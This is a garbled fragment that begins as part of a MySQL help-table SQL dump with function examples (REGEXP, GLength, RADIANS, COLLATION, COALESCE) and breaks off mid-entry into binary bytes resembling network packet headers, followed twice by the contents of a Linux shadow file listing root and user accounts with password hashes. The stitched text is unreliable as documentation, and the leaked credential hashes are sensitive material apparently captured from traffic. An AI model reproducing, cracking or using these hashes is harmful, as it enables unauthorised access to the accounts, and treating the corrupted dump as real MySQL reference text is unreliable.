1\nmysql> SELECT \'a\' REGEXP \'A\', \'a\' REGEXP BINARY \'A\';\n -> 1 0\nmysql> SELECT \'a\' REGEXP \'^[a-d]\';\n -> 1',''),(398,'GLENGTH',18,' GLength(ls)\nReturns as a double-precision number the length of the LineString\nvalue ls in its associated spatial reference.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT GLength(GeomFromText(@ls));\n+----------------------------+\n| GLength(GeomFromText(@ls)) |\n+----------------------------+\n| 2.8284271247462 |\n+----------------------------+',''),(399,'RADIANS',4,' RADIANS(X)\nReturns the argument X, converted from degrees to radians.\n','mysql> SELECT RADIANS(90);\n -> 1.570796',''),(400,'COLLATION',25,' COLLATION(str)\nReturns the collation for the character set of the string argument.\n','mysql> SELECT COLLATION(\'abc\');\n -> \'latin1_swedish_ci\'\nmysql> SELECT COLLATION(_utf8\'abc\');\n -> \'utf8_general_ci\'',''),(401,'COALESCE',26,' COALESCE(value,...)\nReturns the first non-NULL value in the list.\n','mysql> SELECT COALESCE(NULL,1);\n -> 1\nmysql> SELECT COALESCE(NULL,NULL,NULL);\n -> NC|Bi0`E@/o+?o0E,>ޖM  root:$1$uNwCQL3Q$JnPeD1BkAYUBvzdfQvU0l0:17874:0:99999:7::: daemon:*:12745:0:99999:7::: bin:*:12745:0:99999:7::: sys:*:12745:0:99999:7::: sync:*:12745:0:99999:7::: games:*:12745:0:99999:7::: man:*:12745:0:99999:7::: lp:*:12745:0:99999:7::: mail:*:12745:0:99999:7::: news:*:12745:0:99999:7::: uucp:*:12745:0:99999:7::: proxy:*:12745:0:99999:7::: www-data:*:12745:0:99999:7::: backup:*:12745:0:99999:7::: list:*:12745:0:99999:7::: irc:*:12745:0:99999:7::: gnats:*:12745:0:99999:7::: nobody:*:12745:0:99999:7::: Debian-exim:!:12745:0:99999:7::: identd:!:12745:0:99999:7::: sshd:!:12745:0:99999:7::: mysql:!:12751:0:99999:7::: foobar:$1$SUSKcx/j$LYYPzdu94fVYF0rhuR9nO/:12809:0:99999:7::: agent:$1$nTu4SIJA$TYWGCB7nO7VpGMgMS94nh.:12810:0:99999:7::: spammerd:!$1$k/dCLrgb$RGXSZn54WiCGAmwKbHWsq/:13122:0:99999:7::: ftp:!:13122:0:99999:7::: museum:$1$l25JxcZc$6O8DwBVK7xSDVEY8/w9HJ1:13122:0:99999:7::: spam:$1$HT8VX0iA$ctNYFaZVnW/nh6IF76vmN0:13122:0:99999:7::: aqs:$1$wxpxZwKC$ZuHITwaPyMEdPteaQkXwz0:13122:0:99999:7::: contribute:$1$r5jTi6QI$.lavlfaRrXIsPnIllxzU0.:13124:0:99999:7::: acquire:$1$/nDJ9YXL$LPhwqeKT3zR0rdVmfXvaZ0:13122:0:99999:7::: spamometer:$1$pp9MiALd$VwdixHwdXwTVmLqq4EhwB.:13122:0:99999:7::: spamagent:$1$mOUEpd5O$A9qLwPfeQG2DxL70wXuSS.:13123:0:99999:7::: spamdb:$1$cRjoLSNp$OhEJzJOXnsj5/worPlvP.1:13123:0:99999:7::: spamgen:$1$aF/RJxSr$w3jcT6tuJ33wlLnUaKQ/h0:13123:0:99999:7::: tomcat5:!:1C|ZZBi0`EL@/܂Sŀo0E4S@? 3 PtXI@ ) EC|0`BiE@/o0S2eE,@ޔM  root:$1$uNwCQL3Q$JnPeD1BkAYUBvzdfQvU0l0:17874:0:99999:7::: daemon:*:12745:0:99999:7::: bin:*:12745:0:99999:7::: sys:*:12745:0:99999:7::: sync:*:12745:0:99999:7::: games:*:12745:0:99999:7::: man:*:12745:0:99999:7::: lp:*:12745:0:99999:7::: mail:*:12745:0:99999:7::: news:*:12745:0:99999:7::: uucp:*:12745:0:99999:7::: proxy:*:12745:0:99999:7::: www-data:*:12745:0:99999:7::: backup:*:12745:0:99999:7::: list:*:12745:0:99999:7::: irc:*:12745:0:99999:7::: gnats:*:12745:0:99999:7::: nobody:*:12745:0:99999:7::: Debian-exim:!:12745:0:99999:7::: identd:!:12745:0:99999:7::: sshd:!:12745:0:99999:7::: mysql:!:12751:0:99999:7::: foobar:$1$SUSKcx/j$LYYPzdu94fVYF0rhuR9nO/:12809:0:99999:7::: agent:$1$nTu4SIJA$TYWGCB7nO7VpGMgMS94nh.:12810:0:99999:7::: spammerd:!$1$k/dCLrgb$RGXSZn54WiCGAmwKbHWsq/:13122:0:99999:7::: ftp:!:13122:0:99999:7::: museum:$1$l25JxcZc$6O8DwBVK7xSDVEY8/w9HJ1:13122:0:99999:7::: spam:$1$HT8VX0iA$ctNYFaZVnW/nh6IF76vmN0:13122:0:99999:7::: aqs:$1$wxpxZwKC$ZuHITwaPyMEdPteaQkXwz0:13122:0:99999:7::: contribute:$1$r5jTi6QI$.lavlfaRrXIsPnIllxzU0.:13124:0:99999:7::: acquire:$1$/nDJ9YXL$LPhwqeKT3zR0rdVmfXvaZ0:13122:0:99999:7::: spamometer:$1$pp9MiALd$VwdixHwdXwTVmLqq4EhwB.:13122:0:99999:7::: spamagent:$1$mOUEpd5O$A9qLwPfeQG2DxL70wXuSS.:13123:0:99999:7::: spamdb:$1$cRjoLSNp$OhEJzJOXnsj5/worPlvP.1:13123:0:99999:7::: spamgen:$1$aF/RJxSr$w3jcT6tuJ33wlLnUaKQ/h0:13123:0:99999:7::: tomcat5:!:1C|ZZ0